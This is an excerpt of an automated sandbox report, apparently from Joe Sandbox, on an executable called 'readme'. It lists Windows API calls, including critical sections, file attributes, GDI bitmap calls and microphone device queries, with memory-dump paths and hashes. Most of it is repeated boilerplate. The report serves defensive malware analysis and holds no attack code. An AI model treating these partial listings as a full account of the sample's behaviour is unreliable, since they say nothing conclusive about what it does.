                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?,?,004E515B,?,?,00000000,0041D485), ref: 004E46D9
                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?,?,004E515B,?,?,00000000,0041D485), ref: 004E46E6
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000013.00000002.1647845801.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000013.00000002.1647792820.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648148817.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648296468.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648616432.0000000000674000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648825942.00000000006E7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648854998.00000000006EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648894935.00000000006F5000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648929772.00000000006F9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649027493.0000000000700000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649055213.0000000000703000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649089510.0000000000709000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649214680.000000000070E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649309849.000000000073C000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649361299.000000000073F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_19_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$Delete$EnterLeave
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3104255891-0
                                                                                                                                                                                                          • Opcode ID: 9344d0e21620c09b28f686a70e2872a698c0d1dfac57927c88a57cb864f4338f
                                                                                                                                                                                                          • Instruction ID: c031ed0988ac34fb64eb35ca7992c3622ed3d26c78e5592643255ae209dbdd49
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9344d0e21620c09b28f686a70e2872a698c0d1dfac57927c88a57cb864f4338f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D101D4B750060C5BC2106B35EC81BAF73A8AFC4214F05051EF54F93241DA68B8088BA1
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetFileAttributesExA.KERNEL32(?,00000000,?,00000000,2E736D6D,?,?,?,?,?,?,?,?,0041C852,00000000,?), ref: 004CFE0F
                                                                                                                                                                                                            • Part of subcall function 004CB0E0: GetVersionExA.KERNEL32 ref: 004CB0FB
                                                                                                                                                                                                          • GetFileAttributesExW.KERNEL32(00000000,00000000,?,?,?,00000000,2E736D6D,?,?,?,?,?,?,?,?,0041C852), ref: 004CFDAF
                                                                                                                                                                                                          • GetFileAttributesExA.KERNEL32(00000000,00000000,?,2E736D6D,?,?,?,?,?,?,?,?,0041C852,00000000,?,00000000), ref: 004CFDED
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000013.00000002.1647845801.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000013.00000002.1647792820.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648148817.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648296468.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648616432.0000000000674000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648825942.00000000006E7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648854998.00000000006EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648894935.00000000006F5000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648929772.00000000006F9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649027493.0000000000700000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649055213.0000000000703000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649089510.0000000000709000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649214680.000000000070E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649309849.000000000073C000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649361299.000000000073F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_19_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AttributesFile$Version
                                                                                                                                                                                                          • String ID: \\?\
                                                                                                                                                                                                          • API String ID: 3849939888-4282027825
                                                                                                                                                                                                          • Opcode ID: f361000200f27e6454158b11577cb5cd6586d4ef8c56bbe8a0e4f20a4d525da9
                                                                                                                                                                                                          • Instruction ID: f991edffad243b4bd670aca913d189ed867c40d808b57564552852d0b3f79ee3
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f361000200f27e6454158b11577cb5cd6586d4ef8c56bbe8a0e4f20a4d525da9
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6431277A90031067D710AA65AC42FEB73995F85704F54042FF90687352EB6D9C0EC2EA
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,00000000,00000000), ref: 004FA67B
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004FA749
                                                                                                                                                                                                            • Part of subcall function 004F9B30: EnterCriticalSection.KERNEL32(?,00000000,?,004FA7A6,?,?,7772FFB0), ref: 004F9B35
                                                                                                                                                                                                            • Part of subcall function 004F9B30: LeaveCriticalSection.KERNEL32(?), ref: 004F9B84
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000100,00000000,00000000,?), ref: 004FA715
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000013.00000002.1647845801.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000013.00000002.1647792820.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648148817.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648296468.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648616432.0000000000674000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648825942.00000000006E7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648854998.00000000006EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648894935.00000000006F5000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648929772.00000000006F9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649027493.0000000000700000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649055213.0000000000703000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649089510.0000000000709000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649214680.000000000070E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649309849.000000000073C000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649361299.000000000073F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_19_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave$ByteCharMultiWide
                                                                                                                                                                                                          • String ID: FriendlyName
                                                                                                                                                                                                          • API String ID: 904232820-3623505368
                                                                                                                                                                                                          • Opcode ID: 959ce2fe4b047605d4d04147b9c19dc8780e3383a8dda147e2258153261544ba
                                                                                                                                                                                                          • Instruction ID: 4f25218f4a75fa1caa45750efdb6ff353ea89136e06b91a5ad3ed6f7a0914714
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 959ce2fe4b047605d4d04147b9c19dc8780e3383a8dda147e2258153261544ba
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A212A75244301AFD220EB54DC49F5BB7F8BF88714F008A1DFA899B290D774F8098BA6
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 004CADB4
                                                                                                                                                                                                          • CreateDIBSection.GDI32(00000000,?,00000000,?,00000000,00000000), ref: 004CADC8
                                                                                                                                                                                                          • GetObjectA.GDI32(00000000,00000018,?), ref: 004CADD8
                                                                                                                                                                                                          • DeleteDC.GDI32(00000000), ref: 004CADFF
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000013.00000002.1647845801.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000013.00000002.1647792820.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648148817.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648296468.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648616432.0000000000674000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648825942.00000000006E7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648854998.00000000006EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648894935.00000000006F5000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648929772.00000000006F9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649027493.0000000000700000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649055213.0000000000703000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649089510.0000000000709000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649214680.000000000070E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649309849.000000000073C000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649361299.000000000073F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_19_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Create$CompatibleDeleteObjectSection
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3137390749-0
                                                                                                                                                                                                          • Opcode ID: a74e2540195e9566e7a2ac5dffe2e2de3f45b10f51a9d4c1ea3247f6bedff2c4
                                                                                                                                                                                                          • Instruction ID: ec125f8efd539a004f5243cd975522e641b23088832de904e1665531ca55df12
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a74e2540195e9566e7a2ac5dffe2e2de3f45b10f51a9d4c1ea3247f6bedff2c4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2981AFB56043458FC324CF29D484A67FBF1BF98314F148A6ED58A87712D334E989CBA6
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32 ref: 0052AFF0
                                                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 0052B016
                                                                                                                                                                                                            • Part of subcall function 0040C250: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 0040C25F
                                                                                                                                                                                                            • Part of subcall function 0040C250: Sleep.KERNEL32(00000000,?,?,0052B390,?,004012F9,00000008), ref: 0040C272
                                                                                                                                                                                                            • Part of subcall function 0040C250: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 0040C279
                                                                                                                                                                                                          • InterlockedExchange.KERNEL32(?,00000000), ref: 0052B050
                                                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 0052B05B
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000013.00000002.1647845801.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000013.00000002.1647792820.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648148817.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648296468.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648616432.0000000000674000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648825942.00000000006E7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648854998.00000000006EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648894935.00000000006F5000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648929772.00000000006F9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649027493.0000000000700000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649055213.0000000000703000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649089510.0000000000709000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649214680.000000000070E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649309849.000000000073C000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649361299.000000000073F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_19_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CounterExchangeInterlockedPerformanceQuery$Compare$Sleep
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 188302963-0
                                                                                                                                                                                                          • Opcode ID: c96cf593c803fdbd1df6e800226bb337d538f109cfd51101e6c499ec62b01222
                                                                                                                                                                                                          • Instruction ID: 331ae7ec3883c6fb41667714d1c2397b805b788a0704fbfdebc2abdcd4384ec1
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c96cf593c803fdbd1df6e800226bb337d538f109cfd51101e6c499ec62b01222
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 19212A75604712ABC318DF65D884A9AF7E8BF89300F040A1DE85993780D734F918CBA2
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 004E4850: waveInGetNumDevs.WINMM(defaultmicrophone,00000000,?,00000000,?,?,?,?,004E8459,?,?,?,?,?,?,?), ref: 004E489B
                                                                                                                                                                                                            • Part of subcall function 004E4C80: EnterCriticalSection.KERNEL32(?,00000000,?,00000000,?,004E5C7E,00000000,00000000,00000000,echosuppression,gain,00000000,00000000,?,?,004E8459), ref: 004E4C8A
                                                                                                                                                                                                            • Part of subcall function 004E4C80: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004E4CD7
                                                                                                                                                                                                            • Part of subcall function 004E3860: EnterCriticalSection.KERNEL32(?,00000000,?,004E5C91,?,00000000,00000000,00000000,echosuppression,gain,00000000,00000000,?,?,004E8459), ref: 004E3868
                                                                                                                                                                                                            • Part of subcall function 004E3860: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004E388F
                                                                                                                                                                                                            • Part of subcall function 004E5B40: EnterCriticalSection.KERNEL32(?,00000000,?,00000000,?,004E5C9B,00000000,?,00000000,00000000,00000000,echosuppression,gain,00000000,00000000,?), ref: 004E5B4C
                                                                                                                                                                                                            • Part of subcall function 004E5B40: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004E5B71
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00000004,00000000,?,00000000,00000000,00000000,echosuppression,gain,00000000,00000000,?,?,004E8459), ref: 004E5CA2
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00000004,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004E5CB2
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000013.00000002.1647845801.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000013.00000002.1647792820.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648148817.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648296468.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648616432.0000000000674000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648825942.00000000006E7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648854998.00000000006EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648894935.00000000006F5000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648929772.00000000006F9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649027493.0000000000700000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649055213.0000000000703000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649089510.0000000000709000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649214680.000000000070E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649309849.000000000073C000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649361299.000000000073F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_19_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave$Devswave
                                                                                                                                                                                                          • String ID: echosuppression$gain
                                                                                                                                                                                                          • API String ID: 967401230-1829011300
                                                                                                                                                                                                          • Opcode ID: 546b0f3ebceeb7a0da23e6f321f446937bde9f1e62618b4c4d58b1762877edae
                                                                                                                                                                                                          • Instruction ID: eec625d20ecc8ac728587d7ca18c0fda910ff7f544bd80cb39fcd025b5d808b6
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 546b0f3ebceeb7a0da23e6f321f446937bde9f1e62618b4c4d58b1762877edae
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C118E35700B449BC711EB67C9A1A2BB3B9BF8871AB15049EE5464B741CB24FC02CBA4
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0050B060: CreateEventA.KERNEL32(00000000,?,00000000,00000000,00000000,00509F02,00000000,00000000,?,0000007C,?,00000004,00000000,00000008,00000000,004F924E), ref: 0050B06E
                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(0000007C,00000001,00000001,00000000,00000000,?,0000007C,?,00000004,00000000,00000008,00000000,004F924E,00549D98,?,?), ref: 00509F34
                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(00000094,?,?,?,?,?,?,?,?,7772FFB0), ref: 00509F3D
                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32 ref: 00509F6E
                                                                                                                                                                                                          • SetEvent.KERNEL32 ref: 00509F74
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000013.00000002.1647845801.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000013.00000002.1647792820.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648148817.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648296468.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648616432.0000000000674000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648825942.00000000006E7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648854998.00000000006EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648894935.00000000006F5000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648929772.00000000006F9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649027493.0000000000700000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649055213.0000000000703000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649089510.0000000000709000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649214680.000000000070E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649309849.000000000073C000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649361299.000000000073F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_19_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalInitializeSection$Event$Create
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 662013055-0
                                                                                                                                                                                                          • Opcode ID: 8b41bb8ea36a2531d5352067329df235b3019d45486671b4f72c125a1e36c2c0
                                                                                                                                                                                                          • Instruction ID: a00b6d7b902e657a52a59b9571d5736a80dfe09fbfe7896e9036a1fe9281f1e6
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b41bb8ea36a2531d5352067329df235b3019d45486671b4f72c125a1e36c2c0
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9B21C4B1540B049FE320DF6AD884A9BFBE8FF94704F00490EE1AA83661D7B1B405CB61
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetSystemDirectoryA.KERNEL32(?,00000105), ref: 004D2AB9
                                                                                                                                                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 004D2B3D
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000013.00000002.1647845801.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000013.00000002.1647792820.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648148817.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648296468.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648616432.0000000000674000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648825942.00000000006E7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648854998.00000000006EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648894935.00000000006F5000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648929772.00000000006F9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649027493.0000000000700000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649055213.0000000000703000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649089510.0000000000709000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649214680.000000000070E000.00000040.00000001.01000000.0000000E.sdmpDownload File
